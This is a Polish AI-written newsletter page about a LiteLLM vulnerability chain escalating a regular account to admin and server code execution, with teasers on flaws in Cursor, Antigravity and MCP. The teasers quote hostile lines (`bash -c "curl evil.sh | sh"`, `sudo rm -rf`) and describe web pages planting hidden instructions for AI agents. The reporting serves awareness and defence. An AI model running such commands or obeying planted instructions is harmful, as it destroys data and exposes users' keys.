SmartDigest Tworzone przez AI, żeby nadążyć za AI
Zapisz się

Zapisz się do newslettera

Co tydzień najważniejsze newsy AI prosto na Twój e-mail. Wybierz tematy, które Cię interesują.

Bezpieczeństwo

Trzy dziury w LiteLLM: od zwykłego konta do shella na serwerze

Badacze z Obsidian Security pokazali w połowie czerwca, że w LiteLLM, pośredniku zbierającym klucze do OpenAI, Anthropica czy Gemini pod jednym interfejsem, da się z konta zwykłego użytkownika dojść do roli admina i uruchomienia własnego kodu na serwerze. Łańcuch trzech podatności dostał ocenę CVSS 9,9, a komplet poprawek jest dopiero w wydaniu v1.83.14-stable. Najgroźniejsze nie jest to, że atakujący odczyta wszystkie klucze i prompty, ale że siedząc między agentem a modelem potrafi przerabiać jego odpowiedzi w locie.

Napisała AI, żeby oszczędzić Ci czytania setek źródeł.  ·  Jak to działa

Bezpieczeństwo  ·  7 min  · 

Trzy dziury w LiteLLM: od zwykłego konta do shella na serwerze
Ilustrację przygotowała AI.

Przez jedno pudełko przechodzą wszystkie klucze, wszystkie prompty i wszystkie odpowiedzi, jakie twoja aplikacja wymienia z modelami językowymi. Kto je przejmie, przejmuje całą tę komunikację naraz. Tym pudełkiem bywa LiteLLM, popularne, otwarte oprogramowanie pośredniczące, które stawiasz przed swoją aplikacją. Wpisujesz do niego klucze do OpenAI, Anthropica, Gemini, Bedrocka czy Azure, czyli dane logowania do każdego z tych dostawców, a ono wystawia je wszystkie pod jednym interfejsem zgodnym z OpenAI. Dzięki temu twój kod woła zawsze ten sam adres, a o tym, do którego dostawcy faktycznie pójdzie zapytanie, decyduje pośrednik. Wygodne. Problem w tym, że taki pośrednik siedzi w bardzo czułym miejscu: wszystko przechodzi przez niego.

I właśnie to pokazali w połowie czerwca badacze z Obsidian Security. Domyślne konto bez żadnych specjalnych uprawnień, takie, jakie dostaje zwykły użytkownik wewnętrzny, da się rozbudować aż do pełnego admina i uruchomienia własnego kodu na serwerze. Cały łańcuch dostał ocenę CVSS 9,9, czyli praktycznie maksimum tej skali. Łata jest w wydaniu v1.83.14-stable, pierwszym z kompletem poprawek na trzy złożone na siebie podatności.

Jak zwykły użytkownik zostaje adminem

Czytaj dalej za darmo

Podaj e-mail, aby odblokować pełną treść i cały serwis. Zapiszemy Cię do newslettera.

Powiązane

Dwie linijki, jedna zatwierdzona komenda i klucz SSH wychodzi z komputera Bezpieczeństwo

Dwie linijki, jedna zatwierdzona komenda i klucz SSH wychodzi z komputera

6 min

Pillar Security opisało w Cursorze lukę CVE-2026-22708, w której dwie linijki wystarczą, żeby z komputera wyszedł prywatny klucz SSH: export PAGER przechodzi bez pytania, bo jest wbudowany w powłokę, a ręcznie zatwierdzone git branch posłusznie odpala podłożony ładunek. Atak działał nawet przy pustej liście dozwolonych komend, więc taka lista jest wygodą, a nie granicą bezpieczeństwa, i dopiero wersja 2.3 Cursora ją domknęła. Docker Sandboxes przycina zasięg szkód, ale katalog z kodem wciąż jest podpięty żywcem z hosta, więc pułapkę w skryptach gita można zostawić na potem.

Twój agent czyta w sieci to, czego ty w przeglądarce nigdy nie zobaczysz Bezpieczeństwo

Twój agent czyta w sieci to, czego ty w przeglądarce nigdy nie zobaczysz

3 min

Forcepoint X-Labs w kwietniu 2026 namierzył 10 żywych domen z ukrytymi instrukcjami dla agentów: na faladobairro.com czeka `sudo rm -rf`, na perceptivepumpkin.com żądanie 5000 dolarów przez PayPal.me. Pillar Security pokazał drugą warstwę: parametr `find_my_name` w Antigravity od Google przepuszcza wzorce z `-Xsh` prosto do shella. Wniosek: tnij uprawnienia agenta i trzymaj nieznany kod w kontenerze.

Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją Bezpieczeństwo

Dwa tygodnie po raporcie OX Security, MCP wciąż dziurawy z premedytacją

4 min

Dwa tygodnie po raporcie OX Security dziura w MCP, pozwalająca wstawić `bash -c "curl evil.sh | sh"` w konfigurację STDIO, wciąż nie jest załatana — Anthropic nazwał to zachowaniem oczekiwanym. Klasyczne kontrole, EDR, DLP czy firewall, nie widzą ruchu między agentem a danymi, a badanie 14 904 GPT-ów pokazało, że 97% pada od odgrywania roli. Skoro agentowi nie można ufać, egzekucja polityki musi zejść do warstwy dostępu do danych. Z 11 katalogów MCP dziewięć przyjęło proof-of-concept OX bez weryfikacji.